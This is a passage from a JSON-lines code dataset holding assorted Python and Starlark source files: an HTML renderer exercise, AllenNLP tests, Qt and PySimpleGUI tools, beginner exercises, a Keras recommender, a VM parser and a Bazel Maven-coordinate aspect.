self.indentation)\n else:\n fileout.write(cur_ind + f' {obj}')\n fileout.write(\"\\n\")\n fileout.write(cur_ind + \"\\n\".format(self.tag))\n except IOError:\n print(\"Could not open the file \"+fileout+'.txt')\n\n\nclass Html(Element):\n tag = 'html'\n\n def render(self, fileout, cur_ind=\" \"):\n try:\n fileout.write(\"\\n\")\n Element.render(self, fileout, cur_ind=\"\")\n except IOError:\n print(\"Could not open the file \"+fileout+'.txt')\n\n\nclass Body(Element):\n tag = 'body'\n\n\nclass P(Element):\n tag = 'p'\n\n\nclass Head(Element):\n tag = \"head\"\n\n\nclass OneLineTag(Element):\n def render(self, fileout, cur_ind=\" \"):\n try:\n fileout.write(cur_ind + f'{\"<\"}{self.tag}{\" \"}')\n for i, j in self.kwargs.items():\n fileout.write(f'{i} {\"=\"} {j}')\n fileout.write(\">\")\n for obj in self.content:\n if isinstance(obj, Element):\n obj.render(fileout, cur_ind + self.indentation)\n else:\n fileout.write(cur_ind + f' {obj}')\n fileout.write(cur_ind + \"\\n\".format(self.tag))\n except IOError:\n print(\"Could not open the file \"+fileout+'.txt')\n\n\nclass Title(OneLineTag):\n tag = \"title\"\n\n\nclass SelfClosingTag(Element):\n def __init__(self, content=None, **kwargs):\n if content is not None:\n raise TypeError(\"Self closing tag cannot have any content. Please remove them and try again!\")\n else:\n self.kwargs = kwargs\n\n def render(self, fileout, cur_ind=\" \"):\n try:\n fileout.write(cur_ind + f'{\"<\"}{self.tag}{\" \"}')\n for i, j in self.kwargs.items():\n fileout.write(f'{i} {\"=\"} {j}')\n fileout.write(\" />\\n\")\n except IOError:\n print(\"Could not open the file \"+fileout+'.txt')\n\n\nclass Hr(SelfClosingTag):\n tag = 'hr'\n\n\nclass Br(SelfClosingTag):\n tag = 'br'\n\n\nclass Meta(SelfClosingTag):\n tag = 'meta'\n\n\nclass A(Element):\n tag = 'a'\n\n def __init__(self, link, content):\n Element.__init__(self, content, href=link)\n\n def render(self, fileout, cur_ind = \" \"):\n try:\n fileout.write(cur_ind + f'{\"<\"}{self.tag}{\" \"}')\n for i, j in self.kwargs.items():\n fileout.write(f'{i} {\"=\"} {j}')\n fileout.write(\" />\")\n except IOError:\n print(\"Could not open the file \"+fileout+'.txt')\n\n\nclass Ul(Element):\n tag = 'ul'\n\n\nclass Li(Element):\n tag = 'li'\n\n\nclass H(OneLineTag):\n def __init__(self, level, content, **kwargs):\n OneLineTag.__init__(self, content, **kwargs)\n self.level = level\n self.tag = f'{\"h\"}{level}'\n\n","sub_path":"students/shibin_mathew/lesson7/html_render.py","file_name":"html_render.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"635628108","text":"from pathlib import Path\n\nfrom flaky import flaky\nimport pytest\nfrom allennlp.common.testing import ModelTestCase\nfrom allennlp.common.checks import ConfigurationError\nfrom allennlp.common.params import Params\nfrom allennlp.models import Model\n\nimport multitask_negation_target\nfrom multitask_negation_target.tests import util\n\n#\n# For the non-crf tagger version tests see shared_softmax_tagger_test.py\n#\n\nclass SharedCrfTaggerTest(ModelTestCase):\n DATA_DIR = util.FIXTURES_ROOT / \"allen\" / \"dataset_readers\" / \"negation_speculation\"\n MODEL_DIR = util.FIXTURES_ROOT / \"allen\" / \"models\" / \"shared_crf_tagger\"\n\n def setUp(self):\n super().setUp()\n self.shared_only_fp = self.MODEL_DIR / \"shared_only_experiment.jsonnet\"\n self.shared_model_fp = self.MODEL_DIR / \"experiment_shared_encoder.jsonnet\"\n self.shared_skip_connections_model_fp = 
self.MODEL_DIR / \"experiment_shared_encoder_skip_connections.jsonnet\"\n\n model_fp = self.MODEL_DIR / \"experiment.jsonnet\"\n data_fp = self.DATA_DIR / \"conan_doyle_data.conllu\"\n self.set_up_model(model_fp, data_fp,)\n\n def test_simple_tagger_can_train_save_and_load(self):\n self.ensure_model_can_train_save_and_load(self.param_file)\n \n def test_shared_tagger_can_train_save_and_load(self):\n self.ensure_model_can_train_save_and_load(self.shared_model_fp)\n \n def test_shared_only_can_train_save_and_load(self):\n self.ensure_model_can_train_save_and_load(self.shared_only_fp)\n \n def test_shared_and_skip_connections_tagger_can_train_save_and_load(self):\n self.ensure_model_can_train_save_and_load(self.shared_skip_connections_model_fp)\n\n @flaky\n def test_batch_predictions_are_consistent(self):\n self.ensure_batch_predictions_are_consistent()\n\n def test_forward_pass_runs_correctly(self):\n training_tensors = self.dataset.as_tensor_dict()\n output_dict = self.model(**training_tensors)\n tags = output_dict[\"tags\"]\n assert len(tags) == 2\n assert len(tags[0]) == 9\n assert len(tags[1]) == 18\n for example_tags in tags:\n for tag_id in example_tags:\n tag = self.model.vocab.get_token_from_index(tag_id, namespace=\"negation_labels\")\n assert tag in {\"O\", \"I_scope\", \"B_scope\", \"B_cue\"}\n\n def test_mismatching_dimensions_throws_configuration_error(self):\n params = Params.from_file(self.param_file)\n # Make the encoder wrong - it should be 210 to match\n # the embedding dimension from the text_field_embedder.\n params[\"model\"][\"task_encoder\"][\"input_size\"] = 10\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n \n def test_mismatching_shared_encoder_dimensions_throws_configuration_error(self):\n params = Params.from_file(self.shared_model_fp)\n # Make the shared encoder wrong - it should be 210 to match\n # the embedding dimension from the text_field_embedder.\n params[\"model\"][\"shared_encoder\"][\"input_size\"] = 10\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n \n def test_mismatching_task_encoder_dimensions_throws_configuration_error(self):\n params = Params.from_file(self.shared_model_fp)\n # Make the task encoder wrong - it should be 600 to match the shared \n # encoder\n params[\"model\"][\"task_encoder\"][\"input_size\"] = 590\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n\n def test_task_and_shared_is_required(self):\n params = Params.from_file(self.shared_only_fp)\n del params[\"model\"][\"shared_encoder\"]\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n\n def test_shared_cannot_have_skip(self):\n params = Params.from_file(self.shared_only_fp)\n params[\"model\"][\"skip_connections\"] = True\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n\n def test_mismatching_skip_connections_dimensions_throws_configuration_error(self):\n params = Params.from_file(self.shared_skip_connections_model_fp)\n # Make the task encoder wrong - it should be 810 to match the shared \n # encoder\n params[\"model\"][\"task_encoder\"][\"input_size\"] = 600\n with pytest.raises(ConfigurationError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))\n\n def test_skip_connections_value(self):\n # If a model does not have a shared encoder and the skip 
connections is \n # True should raise a ValueError\n params = Params.from_file(self.param_file)\n params[\"model\"][\"skip_connections\"]= True\n with pytest.raises(ValueError):\n Model.from_params(vocab=self.vocab, params=params.pop(\"model\"))","sub_path":"multitask_negation_target/tests/allen/models/shared_crf_tagger_test.py","file_name":"shared_crf_tagger_test.py","file_ext":"py","file_size_in_byte":5011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"533571414","text":"import PySimpleGUI as sg\n\n\ndef main_layout(condo_dict: dict) -> list:\n \"\"\"\n Layout for the main window, needs the condo dict to show all condos\n \"\"\"\n layout = [\n [sg.Checkbox(\"Seleziona tutti\", default=True, key=\"-TUTTI-\", enable_events=True)],\n [sg.Frame(\"Seleziona i tracciati da scaricare\", layout=[[sg.Col(layout=[[sg.Checkbox(\"896\", default=True, key=(\"896\", x))] + \n [sg.Checkbox(\"CBI\", default=True, key=(\"CBI\", x))] + \n [sg.T(x, pad=(5, 0))] for x in condo_dict.keys()],\n scrollable=True, vertical_scroll_only=True, size=(650, 700))]])\n ],\n [sg.ProgressBar(100, orientation=\"horizontal\", style=\"winnative\", key=\"-BAR-\", size=(20, 20)), sg.T(\"In attesa...\", key=\"-MESSAGE-\", size=(40, 2), font=\"Consolas 12\")],\n [sg.Button(\"Scarica selezionati\", key=\"-SCARICA-\")]\n ]\n return layout\n\n\ndef update_bar_message(message: str, counter: int, window: sg.Window):\n \"\"\"\n Updates progress bar and output message, returns counter +1\n \"\"\"\n msg = window[\"-MESSAGE-\"]\n bar = window[\"-BAR-\"]\n counter += 1\n bar.update_bar(counter)\n msg.update(message)\n window.refresh()\n return counter\n\ndef permute_checkboxes(window: sg.Window, values: dict):\n new_value = values[\"-TUTTI-\"]\n checkboxes = [window[key] for key in values if isinstance(key, tuple) and key[0] in (\"896\", \"CBI\")]\n for cb in checkboxes:\n cb.update(new_value)","sub_path":"application/gui/layouts.py","file_name":"layouts.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"123521248","text":"#!/usr/bin/env python\n__all__ = ['eis_browse_templates']\n\nimport sys\nimport os\nimport numpy as np\nimport shutil\nfrom PyQt5 import Qt, QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon, QPixmap, QImage\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom eispac.templates import eis_find_templates\n\nclass Top(QWidget):\n\n def __init__(self, eis):\n super().__init__()\n self.eis = eis\n self.default_dir = 'eis_template_dir'\n self.font_default = QtGui.QFont(\"Courier\", 12)\n self.font_small = QtGui.QFont(\"Courier\", 10)\n self.winNX = 1458\n self.winNY = 614\n self.leftNX = 450\n\n self.initUI()\n\n def initUI(self):\n self.buttonQuit = QPushButton('Quit')\n self.buttonQuit.setFont(self.font_default)\n self.buttonQuit.clicked.connect(self.on_click_button_quit)\n self.buttonQuit.resize(self.leftNX, self.frameGeometry().height())\n\n self.buttonSelect = QPushButton('Select a header file')\n self.buttonSelect.setFont(self.font_default)\n self.buttonSelect.clicked.connect(self.on_click_button_select)\n self.buttonSelect.resize(self.leftNX, self.frameGeometry().height())\n\n self.fileLabel = QLabel()\n self.fileLabel.setFont(self.font_default)\n self.fileLabel.setAlignment(Qt.AlignCenter)\n self.fileLabel.resize(self.leftNX, self.fileLabel.frameGeometry().height())\n self.setup_file_label()\n\n self.listTemplates = QListWidget()\n 
self.listTemplates.setFont(self.font_default)\n self.listTemplates.clicked.connect(self.on_click_list_templates)\n self.setup_list()\n\n self.buttonCopy = QPushButton('Copy Template to Local Dir')\n self.buttonCopy.setFont(self.font_default)\n self.buttonCopy.clicked.connect(self.on_click_button_copy)\n self.buttonCopy.resize(self.leftNX, self.buttonCopy.frameGeometry().height())\n\n self.textWindow = QTextEdit()\n self.textWindow.setFont(self.font_small)\n info = ('* Select an EIS HDF header file.\\n\\n'\n +'* Templates relevant to that file will be listed.\\n\\n'\n +'* Make a selection to display the template applied to some'\n +' represenative solar spectra.\\n\\n'\n +'* Use the copy button to copy the template file to a local'\n +' directory.\\n\\n'\n +'* You only need to copy one file for the template of a'\n ' multi-component fit. All components are listed separately.')\n self.textWindow.append(info+'\\n')\n self.textWindow.setReadOnly(True)\n self.textWindow.resize(self.leftNX, self.textWindow.frameGeometry().height())\n\n self.window = QLabel()\n buff = np.zeros((self.winNX, self.winNX, 3), dtype=np.int16)\n image = QImage(buff, self.winNX, self.winNY, QImage.Format_ARGB32)\n self.window.setPixmap(QPixmap(image))\n\n vbox1 = QVBoxLayout()\n vbox1.addWidget(self.buttonQuit)\n vbox1.addWidget(self.buttonSelect)\n vbox1.addWidget(self.fileLabel)\n vbox1.addWidget(self.listTemplates)\n vbox1.addWidget(self.buttonCopy)\n vbox1.addWidget(self.textWindow)\n vbox1.addStretch()\n\n vbox2 = QVBoxLayout()\n vbox2.addWidget(self.window)\n\n hbox = QHBoxLayout()\n hbox.addLayout(vbox1)\n hbox.addLayout(vbox2)\n\n self.setLayout(hbox)\n\n # --- display the widget\n self.setWindowTitle('Select EIS Fitting Template')\n self.show()\n\n def setup_list(self):\n if self.eis.text_list is not None:\n self.listTemplates.clear()\n self.listTemplates.addItems(self.eis.text_list)\n self.listTemplates.setFont(self.font_default)\n count = self.listTemplates.count()\n if count == 0: count = 2\n if count > 15: count = 15\n nrows = self.listTemplates.sizeHintForRow(0)*count + \\\n 2*self.listTemplates.frameWidth() + 5\n # self.listTemplates.setFixedSize(400, nrows)\n self.listTemplates.resize(self.leftNX, nrows)\n\n def setup_file_label(self):\n if self.eis.filename_head is not None:\n f = os.path.basename(self.eis.filename_head)\n f = f.split('.')[0]\n s = ('Selected header: '+f+'\\n'\n +'--- Available Templates ---\\n'\n +'filename, window num, wmin, wmax')\n self.fileLabel.setText(s)\n else:\n self.fileLabel.setText('No file has been selected')\n\n def on_click_button_quit(self):\n # --- quit the app\n QApplication.instance().quit()\n\n def on_click_button_copy(self):\n item = self.listTemplates.currentItem()\n index = self.listTemplates.indexFromItem(item)\n n = index.row()\n template_file = self.eis.template_list[n][0]\n\n if not os.path.isdir(self.default_dir):\n os.mkdir(self.default_dir)\n s = f'created {self.default_dir}'\n print(s)\n self.textWindow.append(s)\n\n shutil.copy2(template_file, self.default_dir)\n\n s = f'copied {os.path.basename(template_file)} to {self.default_dir}'\n print(s)\n self.textWindow.append(s)\n\n def on_click_button_select(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n eis_filename, _ = QFileDialog.getOpenFileName(self, 'Select a file',\n filter='*.head.h5',\n options=options)\n if os.path.isfile(eis_filename):\n self.eis = eis_find_templates(eis_filename, ignore_local=True)\n self.setup_list()\n self.setup_file_label()\n 
self.set_blank_image()\n\n def on_click_list_templates(self):\n item = self.listTemplates.currentItem()\n index = self.listTemplates.indexFromItem(item)\n n = index.row()\n image_file = self.eis.template_list[n][0].replace('.h5', '.jpg')\n self.display_image(image_file)\n\n def display_image(self, image_file):\n if os.path.isfile(image_file):\n pixmap = QPixmap(image_file)\n pixmap = pixmap.scaled(self.winNX, self.winNY)\n self.window.setPixmap(pixmap)\n\n def set_blank_image(self):\n buff = np.zeros((self.winNX, self.winNX, 3), dtype=np.int16)\n image = QImage(buff, self.winNX, self.winNY, QImage.Format_ARGB32)\n self.window.setPixmap(QPixmap(image))\n\ndef eis_browse_templates():\n # check the input\n if len(sys.argv) > 1:\n eis_filename = sys.argv[1]\n else:\n eis_filename = None\n\n # create the object that actually finds the templates\n eis = eis_find_templates(eis_filename, ignore_local=True)\n\n app = QApplication(sys.argv)\n ex = Top(eis)\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n eis_browse_templates()\n","sub_path":"scripts/eis_browse_templates.py","file_name":"eis_browse_templates.py","file_ext":"py","file_size_in_byte":6889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"201762376","text":"#w3resources a bit more basic. \n\n# 1. current date and time.\n\nimport time\n\nlocaltime = time.asctime(time.localtime(time.time()))\nprint(\"nå er klokken: \", localtime)\n\n\n#2. area of a circle. \n\nimport math \n\nuserInput = int(input(\"Write the radius of your circle:..\"))\n\narea = math.pi * userInput**2 \nprint(\"the area is: \", area)\n\n# 3. print name in reverse order. \n\nfirst = input(\"write your first name: \") \nlast = input(\"write your last name: \")\n\nprint(\"hi \" + last +\" \" + first)\n\n#4. split input. \n\nfilename = input(\"write the whole filename: \")\ntheExstention = filename.split(\".\")\nprint(\"the exstention of the file \" + repr(theExstention[-1])) \n\n#5 output tuples\n\nstring1 = \"3,5,7,23\"\nsplit = string1.split(\",\")\ntuple = tuple(split)\nprint(split)\nprint(tuple)\n\n# edit a list\ncolor_list = [\"Red\",\"Green\",\"White\",\"Black\"]\nprint(color_list[0],color_list[3])\n\n# Use int \n\nn = input(\"enter a number: \")\n\nn1, n2, n3 = n,n*2,n*3\n\nprint(int(n1) + int(n2) + int(n3))\n\n \n\n\n\n","sub_path":"Excercise5.py","file_name":"Excercise5.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"295744124","text":"# Conditionals, Boolean expressions, relational operators\n\nfrom cs50 import get_int\n\n# Prompt user for integers\nx = get_int(\"What's x? \")\ny = get_int(\"What's y? 
\")\n\n# Compare integers\nif x < y:\n print(\"x is less than y\")\nelif x > y:\n print(\"x is greater than y\")\nelse:\n print(\"x is equal to y\")\n","sub_path":"6/src6/1/compare3.py","file_name":"compare3.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"324319908","text":"DATA_DIR = 'data/'\nOUT_DIR = 'out/'\nMIN_POPULARITY = 5\nUPDATE_CYCLE = '6H'\nHISTORY_NUM = 9\nTRAIN_START_DATE = '2016-10-3'\nTRAIN_END_DATE = '2016-10-23'\nTEST_START_DATE = '2016-10-24'\nTEST_END_DATE = '2016-10-30'\nBOUND = 200\nSIMILAR_VIDEO_NUMS = 10\nENCODE_MODEL = 'lstm'\nUSE_PAIRWISE_LOSS = 'yes'\nMAX_WORD_LEN_TITLE = 8\nMAX_WORD_LEN_TAGS = 4\nMAX_WORD_LEN_DESCRIPTION = 30\nCHAR_EMB_DIM = 300\nWORD_EMB_DIM = 200\n","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96663011","text":"import adv.adv_test\nfrom core.advbase import *\nfrom module.bleed import Bleed\nfrom slot.d import *\nfrom slot.a import *\n\ndef module():\n return Sazanka\n\nclass Sazanka(Adv):\n a3 = ('k_sleep', 0.20)\n\n conf = {}\n conf['slot.d'] = Shinobi()\n conf['slot.a'] = KFM()+CE()\n conf['acl'] = \"\"\"\n `s1\n `s3, fsc\n `s2, fsc\n `fs, seq=5\n \"\"\"\n conf['afflict_res.sleep'] = 80\n\n def prerun(this):\n this.bleed = Bleed(\"g_bleed\",0).reset()\n this.s2fscharge = 0\n\n def s1_proc(this, e):\n if random.random() < 0.8:\n Bleed(\"s1\", 1.32).on()\n\n def s2_proc(this, e):\n this.s2fscharge = 3\n\n def fs_proc(this, e):\n if this.s2fscharge > 0:\n this.s2fscharge -= 1\n this.dmg_make(\"o_fs_boost\",0.38)\n this.afflics.sleep('s2_fs', 100, 4.5)\n\n\n\nif __name__ == '__main__':\n conf = {}\n adv.adv_test.test(module(), conf, mass=1)\n","sub_path":"adv/sazanka.py","file_name":"sazanka.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"39990600","text":"class Parser:\n \"\"\"This class parse provided virtual machine command into its underlying field\"\"\"\n\n def __init__(self):\n \"\"\"Nothing to initialize\"\"\"\n pass\n\n\n def clean_line(self, line):\n \"\"\"Get rid of newline keys, comments, whitelines in any line and return it\"\"\"\n \n if \"//\" in line:\n line = line[:line.index(\"//\")]\n\n line = (line[:-1]).strip()\n return line\n\n\n def command_type(self, command):\n \"\"\"Provide the command type\"\"\"\n\n command = command.split()\n if len(command) == 1:\n if command[0] == \"return\":\n return \"C_RETURN\"\n else:\n return \"C_ARITHMETIC\"\n elif len(command) == 2:\n if command[0] == \"push\":\n return \"C_PUSH\"\n elif command[0] == \"pop\":\n return \"C_POP\"\n elif command[0] == \"label\":\n return \"C_LABEL\"\n elif command[0] == \"goto\":\n return \"C_GOTO\"\n elif command[0] == \"if-goto\":\n return \"C_IF\"\n elif len(command) == 3:\n if command[0] == \"function\":\n return \"C_FUNCTION\"\n elif command[0] == \"call\":\n return \"C_CALL\"\n \n\n def command_args(self, command):\n \"\"\"Return the command args\"\"\"\n\n return command.split()","sub_path":"08/VM_Translator/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"395820851","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 11 08:57:42 2018\n\n@author: 
s-long.bao\n\"\"\"\nimport pickle\nfrom torch import nn\nfrom torch import optim\nimport torch\nimport pyodbc\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport torch.utils.data\nimport torch.nn.functional as F\n\nfrom sklearn.utils import shuffle\nfrom keras.models import Model\nfrom keras.layers import Input, Embedding, Dot, Add, Flatten\nfrom keras.regularizers import l2\nfrom keras.optimizers import SGD, Adam\n\n\ncnxn = pyodbc.connect(\"Driver={SQL Server Native Client 11.0};\"\n \"Server=RSSVMKDB-CLUS;\"\n \"uid=readonly;pwd=readonly\")\n\n\nsql = \"\"\"\nSELECT OFFICE_CD,CLIENT_CD,A.DSCR_CD,COUNT(*) AS NUM\nFROM [dbo].[INVST_TRST_TRD] A\nLEFT JOIN INVST_TRUST_DESCRIPTION 銘柄\nON A.DSCR_CD = 銘柄.DSCR_CD\nLEFT OUTER JOIN xuser.dbo.ファンド分類_月次更新 分類\nON 銘柄.ISIN_CODE = 分類.ISINCODE\nWHERE TRADE_DT > '2014-01-01'\nAND COLLCT_ST_DT is null \nAND MATURITY_DT is null\nAND TRD_TYP_CD = 3\nAND REINVST_BUY_KBN = 0\nGROUP BY OFFICE_CD,CLIENT_CD,A.DSCR_CD\n\"\"\"\n\n# read data\ndf = pd.read_sql_query(sql=sql, \n con=cnxn)\ndf['CLIENT_ID'] = df['OFFICE_CD'].astype(str) + df['CLIENT_CD'].astype(str)\ndf = df[['CLIENT_ID','DSCR_CD', 'NUM']]\n\n# data preprocessing\nuser = set(df['CLIENT_ID'].values)\nitem = set(df['DSCR_CD'].values)\n\ndic_user = {}\ndic_item = {}\ndic_user2cd = {}\n\nfor i, u in enumerate(user):\n dic_user[u] = i\n\nfor i, it in enumerate(item):\n dic_item[it] = i\n\nfor u, i in dic_user.items():\n dic_user2cd[i] = u\n\n\ndf['CLIENT'] = df['CLIENT_ID'].apply(lambda x : dic_user[x])\ndf['FUND'] = df['DSCR_CD'].apply(lambda x : dic_item[x])\ndf['LOG_NUM'] = df['NUM'].apply(np.log)\n# parameters \nN = df['CLIENT'].max() + 1\nM = df['FUND'].max() + 1\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\ndf_train, df_test = train_test_split(df, test_size = 0.2, random_state = 0)\n\n# initialize variables\nK = 20  # latent dimensionality\nmu = df_train.LOG_NUM.mean()\nepochs = 15\nreg = 0. 
# regularization penalty\n\n# model implementation\n# keras model\nu = Input(shape=(1,))\nm = Input(shape=(1,))\nu_embedding = Embedding(N, K, embeddings_regularizer=l2(reg))(u) # (N, 1, K)\nm_embedding = Embedding(M, K, embeddings_regularizer=l2(reg))(m) # (N, 1, K)\n\n# subsubmodel = Model([u, m], [u_embedding, m_embedding])\n# user_ids = df_train.userId.values[0:5]\n# movie_ids = df_train.movie_idx.values[0:5]\n# print(\"user_ids.shape\", user_ids.shape)\n# p = subsubmodel.predict([user_ids, movie_ids])\n# print(\"p[0].shape:\", p[0].shape)\n# print(\"p[1].shape:\", p[1].shape)\n# exit()\n\nu_bias = Embedding(N, 1, embeddings_regularizer=l2(reg))(u) # (N, 1, 1)\nm_bias = Embedding(M, 1, embeddings_regularizer=l2(reg))(m) # (N, 1, 1)\nx = Dot(axes=2)([u_embedding, m_embedding]) # (N, 1, 1)\n\n# submodel = Model([u, m], x)\n# user_ids = df_train.userId.values[0:5]\n# movie_ids = df_train.movie_idx.values[0:5]\n# p = submodel.predict([user_ids, movie_ids])\n# print(\"p.shape:\", p.shape)\n# exit()\n\nx = Add()([x, u_bias, m_bias])\nx = Flatten()(x) # (N, 1)\n\nmodel = Model(inputs=[u, m], outputs=x)\nmodel.compile(\n loss='mse',\n # optimizer='adam',\n # optimizer=Adam(lr=0.01),\n optimizer=SGD(lr=0.08, momentum=0.9),\n metrics=['mse'],\n)\n\nr = model.fit(\n x=[df_train.CLIENT.values, df_train.FUND.values],\n y=df_train.LOG_NUM.values - mu,\n epochs=epochs,\n batch_size=128,\n validation_data=(\n [df_test.CLIENT.values, df_test.FUND.values],\n df_test.LOG_NUM.values - mu\n )\n)\n \n# rec_sys implementation\nfrom sortedcontainers import SortedList\ndef rec(user, number = 10):\n rec = SortedList()\n for i,j in dic_item.items():\n score = model.predict([np.array(user).reshape(1,1),np.array(j).reshape(1,1)]) + mu\n rec.add((float(score), i))\n rec = list(reversed(rec))[:number]\n rec_list =[]\n for i, j in rec:\n rec_list.append(j)\n print(\"Recommnendations for OFFICE_CD = %d,CLIENT_CD = %d are following:\" % (int(dic_user2cd[user][:3]),int(dic_user2cd[user][3:])))\n print(rec_list)\n\n# save model and objects\n \nwith open('dic_item', 'wb') as f:\n pickle.dump(dic_item, f)\n\nwith open('dic_user', 'wb') as f:\n pickle.dump(dic_user, f)\n\nwith open('dic_user2cd', 'wb') as f:\n pickle.dump(dic_user2cd, f)\n\nwith open('model', 'wb') as f:\n pickle.dump(model, f)\n\nwith open('mu', 'wb') as f:\n pickle.dump(mu, f)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"DataScienceProject/4.Matrix_Factorization/src/rec_system_mf.py","file_name":"rec_system_mf.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"281637","text":"import logging\nimport queue\nimport threading\nimport time\nfrom contextlib import contextmanager\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_MAX_QUEUE_SIZE = 1000\nDEFAULT_UPDATE_INTERVAL_S = 1\n\n\n@contextmanager\ndef OpenReceivedPaymentsSubscriptionClient(\n squeak_db,\n initial_index,\n max_queue_size=DEFAULT_MAX_QUEUE_SIZE,\n update_interval_s=DEFAULT_UPDATE_INTERVAL_S,\n):\n \"\"\"Custom context manager for opening a received payments client.\"\"\"\n\n # f = open(filename, method)\n client = ReceivedPaymentsSubscriptionClient(\n squeak_db,\n initial_index,\n max_queue_size,\n update_interval_s,\n )\n client.start()\n try:\n # yield f\n yield client\n\n finally:\n # f.close()\n client.stop()\n\n\nclass ReceivedPaymentsSubscriptionClient:\n def __init__(\n self,\n squeak_db,\n initial_index,\n max_queue_size=DEFAULT_MAX_QUEUE_SIZE,\n 
update_interval_s=DEFAULT_UPDATE_INTERVAL_S,\n ):\n self.squeak_db = squeak_db\n self.initial_index = initial_index\n self.update_interval_s = update_interval_s\n self._queue = queue.Queue(max_queue_size)\n self._stopped = threading.Event()\n\n @property\n def queue(self):\n return self._queue\n\n def start(self):\n logger.info(\"Starting received payments subscription client...\")\n populate_queue_thread = threading.Thread(\n target=self._populate_queue,\n args=(),\n )\n populate_queue_thread.start()\n\n def stop(self):\n logger.info(\"Stopping received payments subscription client...\")\n self._stopped.set()\n\n def _populate_queue(self):\n payment_index = self.initial_index\n while not self._stopped.is_set():\n for payment in self._get_received_payments_from_db(payment_index):\n self._queue.put(payment)\n payment_index = payment.received_payment_id\n logger.info(\n \"Added payment to queue. Size: {}\".format(\n self._queue.qsize())\n )\n time.sleep(self.update_interval_s)\n\n def _get_received_payments_from_db(self, payment_index):\n return self.squeak_db.yield_received_payments_from_index(payment_index)\n\n def get_received_payments(self):\n while True:\n payment = self._queue.get()\n yield payment\n self._queue.task_done()\n logger.info(\n \"Removed payment from queue. Size: {}\".format(\n self._queue.qsize())\n )\n","sub_path":"squeaknode/node/received_payments_subscription_client.py","file_name":"received_payments_subscription_client.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"511248217","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\nLOCAL_JDK_PREFIX = \"external/local_jdk/\"\nMAVEN_COORDINATES_PREFIX = \"maven_coordinates=\"\n\n# mapping of single JAR to its Maven coordinates\nJarToMavenCoordinatesMapping = provider(\n fields = {\n \"filename\": \"jar filename\",\n \"maven_coordinates\" : \"Maven coordinates of the jar\"\n },\n)\n\n# mapping of all JARs to their Maven coordinates\nTransitiveJarToMavenCoordinatesMapping = provider(\n fields = {\n 'mapping': 'maps jar filename to coordinates'\n }\n)\n\ndef _transitive_collect_maven_coordinate_impl(_target, ctx):\n mapping = {}\n\n if JarToMavenCoordinatesMapping in _target:\n mapping[_target[JarToMavenCoordinatesMapping].filename] = _target[\n JarToMavenCoordinatesMapping].maven_coordinates\n\n for dep in getattr(ctx.rule.attr, \"jars\", []):\n if TransitiveJarToMavenCoordinatesMapping in dep:\n mapping.update(dep[TransitiveJarToMavenCoordinatesMapping].mapping)\n for dep in getattr(ctx.rule.attr, \"deps\", []):\n if TransitiveJarToMavenCoordinatesMapping in dep:\n mapping.update(dep[TransitiveJarToMavenCoordinatesMapping].mapping)\n for dep in getattr(ctx.rule.attr, \"exports\", []):\n if TransitiveJarToMavenCoordinatesMapping in dep:\n mapping.update(dep[TransitiveJarToMavenCoordinatesMapping].mapping)\n for dep in getattr(ctx.rule.attr, \"runtime_deps\", []):\n if TransitiveJarToMavenCoordinatesMapping in dep:\n mapping.update(dep[TransitiveJarToMavenCoordinatesMapping].mapping)\n\n # don't store jars with no attached Maven coordinates\n cleaned_mapping = {k: v for k,v in mapping.items() if v}\n return 